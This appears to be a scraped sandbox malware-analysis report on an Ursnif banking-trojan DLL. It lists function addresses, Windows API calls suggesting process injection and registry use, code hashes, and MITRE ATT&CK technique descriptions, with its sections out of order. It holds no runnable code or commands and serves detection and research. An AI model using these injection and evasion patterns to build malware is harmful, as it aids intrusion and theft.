Opcode Fuzzy Hash: 519dc60776b9ca6f89daf8f8dd4298df85dfa6902356645fcee39f249e174fd6
Instruction Fuzzy Hash: 24A17030508B0A8FE755DF58D8996B6B7E1FBA8305F00462ED88AC7261EF34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001AADA8, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 001AAF0F

Strings

, xrefs: 001AAE63

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-3916222277
Opcode ID: 830bbffcb8c05e6f4e9a1c12551532b6144be2dd6d4f438fee7140052b19f9eb
Instruction ID: 5d6a6efecae13d8bd2411deb17ba5e508babe44ab18a8685dc78cdf6c11fe06b
Opcode Fuzzy Hash: 830bbffcb8c05e6f4e9a1c12551532b6144be2dd6d4f438fee7140052b19f9eb
Instruction Fuzzy Hash: 6B515675618A484FD72CAF189C86179B7D1EB8A311F90413EE9DAC3261DB349C42C7C3

Uniqueness

Uniqueness Score: -1.00%

Function 001B5704, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00193AD8: VirtualProtect.KERNELBASE ref: 00193B0B

VirtualProtect.KERNELBASE ref: 001B5825
VirtualProtect.KERNELBASE ref: 001B5848

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5be82e024469b0060b7cdeb449c3db8687a4bb9bead9d19944790f7ceb351693
Instruction ID: cb655f216c1121493bcf74d3c0b42355b9f69dd40e6fd64ef8aff7f393f5f46a
Opcode Fuzzy Hash: 5be82e024469b0060b7cdeb449c3db8687a4bb9bead9d19944790f7ceb351693
Instruction Fuzzy Hash: 0A513870618F098FDB44EF29D889765B7E1FBA8315F10056EE88EC3661DB34E941CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0019ABF8, Relevance: 3.2, APIs: 2, Instructions: 152COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 0019AC6B
RtlAddVectoredContinueHandler.NTDLL ref: 0019AD5F

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 107bad3352f75d367d6826b56c95fd86ef06d5e6147534386fc01e9486ae7234
Instruction ID: 4551f58d657c65200ae1ee37f3153403578c778db8f85901723d92f2a36816e1
Opcode Fuzzy Hash: 107bad3352f75d367d6826b56c95fd86ef06d5e6147534386fc01e9486ae7234
Instruction Fuzzy Hash: 91410930608A494FEF65EF78D89466A77E1FF98305FA5412ED446C3261DF78C506CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001A5304, Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,0000F2C0,001A22EA,?,?,?,?,?,?,0000007E,001A19D8), ref: 001A5368
RegCloseKey.KERNELBASE ref: 001A53EB

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 8f346028bf8ab8c24e2adc645180d67bbedfbd13ed81e84d7f3b901f809c6af9
Instruction ID: f9953dea220a628ebb1d0e7aac34b25d7894dc2a243617350cd067dd9f20ab44
Opcode Fuzzy Hash: 8f346028bf8ab8c24e2adc645180d67bbedfbd13ed81e84d7f3b901f809c6af9
Instruction Fuzzy Hash: 7C314F34618A4C4FCB98EF28E894A6A73E1FBA8300B114A7EE44EC3211DB74D945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001B2DBC, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 001B2DFA
RegCloseKey.KERNELBASE ref: 001B2E67

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: c5be40ab19eeb61beca47e9810995b9d640afbf49471262cb8f60ca504eaded5
Instruction ID: cc8a589a7fbe44dd47c05578b6702e8856fa520382ce53b9be5978f9c3cdbd9b
Opcode Fuzzy Hash: c5be40ab19eeb61beca47e9810995b9d640afbf49471262cb8f60ca504eaded5
Instruction Fuzzy Hash: 15215370618B088FE758EF2DE8896A577E1FB98311F11456EE94AC3261EB34DD41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001B1D14, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 001B1D37
RegOpenKeyA.ADVAPI32 ref: 001B1D44

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 406503f632cb1cb0f79136d36545d7ab34832fc44bc7c4979466d37c0338a52d
Instruction ID: 41e9b7fead9ad2960e17a3c7b2009ff037911c62fde7ab512c42a1be6d54c763
Opcode Fuzzy Hash: 406503f632cb1cb0f79136d36545d7ab34832fc44bc7c4979466d37c0338a52d
Instruction Fuzzy Hash: D4019630618A044FDB44EB5CD4987A9B7E1FBEC341F11456DE84EC3261DB74C9458743

Uniqueness

Uniqueness Score: -1.00%

Function 0019FC38, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 0019FC68
QueueUserAPC.KERNELBASE ref: 0019FC7F

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: ea76f1487cfd660644cdf61bfe012611e08129f55b03f628d3dd30beaf8dfdae
Instruction ID: 188018f94c3f4042bdfa1140670c7f78ae2fefdf4babc04937b41412f1d6b2a1
Opcode Fuzzy Hash: ea76f1487cfd660644cdf61bfe012611e08129f55b03f628d3dd30beaf8dfdae
Instruction Fuzzy Hash: F6015230718A588FAB84EF6DD84D66D77E2E798311714856AA80AC3370DF38DC418782

Uniqueness

Uniqueness Score: -1.00%

Function 00192C54, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00192D9F

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a2903d96dff93f64fd2efbb1f9e73888687e76012facccd87ca45df6a1d793ba
Instruction ID: e168cac47fa030183fe1745f38fd54b229a0ae06f85ace8461c0cac986518e53
Opcode Fuzzy Hash: a2903d96dff93f64fd2efbb1f9e73888687e76012facccd87ca45df6a1d793ba
Instruction Fuzzy Hash: 3D617730618F099FDB58EF18D4C5A65B7E4FB6C301B50462EE88AC3261EB34E841CBC6

Uniqueness

Uniqueness Score: -1.00%

Function 00195504, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 0019564A

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 6c0ca870354c098854b5b37cad9cf77460709d8423a67daedbc2fa62b4be5418
Instruction ID: 277cf6fd8041c1303885b74613df559cab8dbcceec92e6c248bd6e95bec20cff
Opcode Fuzzy Hash: 6c0ca870354c098854b5b37cad9cf77460709d8423a67daedbc2fa62b4be5418
Instruction Fuzzy Hash: 0241C430654E5D8FEB69EF5CE8C596573E2F7583507650129E00AC7222DB78EC86C781

Uniqueness

Uniqueness Score: -1.00%

Function 001B5900, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 001B59DD

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c5e785be2a75436919c65a6d927c68dad338f9e24ddefc9688cb41580c5b9315
Instruction ID: 5aa89dce51058ae68a620d8a36d3d5cf9d6613276597e62a56ec888de5c3a5a7
Opcode Fuzzy Hash: c5e785be2a75436919c65a6d927c68dad338f9e24ddefc9688cb41580c5b9315
Instruction Fuzzy Hash: E631713431860A8FEB69EB38E8D567B73E2FB98300B454139E447C3655DF38D8069B41

Uniqueness

Uniqueness Score: -1.00%

Function 001951F0, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 0019529C

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ba0fb4bd59e7dcd0df7f89c5aebcb967222dcc90e184b6033db7472403397e70
Instruction ID: a1ef229f778f3ab6ba1a05ceab391f2f155d62a37ed59470ee9054748676b4d1
Opcode Fuzzy Hash: ba0fb4bd59e7dcd0df7f89c5aebcb967222dcc90e184b6033db7472403397e70
Instruction Fuzzy Hash: FE216D35219F0A8FEB65EB2DD88876A77F2FBA8341B51053DE40AC3264EF74D8418B40

Uniqueness

Uniqueness Score: -1.00%

Function 00193AD8, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00193B0B

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 35b274f450401a10063dd9577b35a6041dc1463f31f6e950750419b89bf37c25
Instruction ID: 21c5a530cd5c55184a34b1f1bb3f810161fbe1ddda505121bda2e5e5859aee84
Opcode Fuzzy Hash: 35b274f450401a10063dd9577b35a6041dc1463f31f6e950750419b89bf37c25
Instruction Fuzzy Hash: 5811963170CB098F9F18EF28A845426B7E5E799314710057DEC8FC3386EE74D9458786

Uniqueness

Uniqueness Score: -1.00%

Function 0019C194, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 001B1044: NtWriteVirtualMemory.NTDLL ref: 001B1063

VirtualProtectEx.KERNELBASE ref: 0019C1E8

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 3cb7de4653fc2148003f9346bb997fc96905e1fcfc3401e54ee9f52ce270d61e
Instruction ID: 77c7b44ed34fa571df9881f5aaa07d5e62df5bb0f0bf1eca243a54b2f2f1e389
Opcode Fuzzy Hash: 3cb7de4653fc2148003f9346bb997fc96905e1fcfc3401e54ee9f52ce270d61e
Instruction Fuzzy Hash: FB017C70618B488FCB48EF5CA0C5525B7E0EB9C310B4005AEE94DC7246CB70DD45CB86

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2790000.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre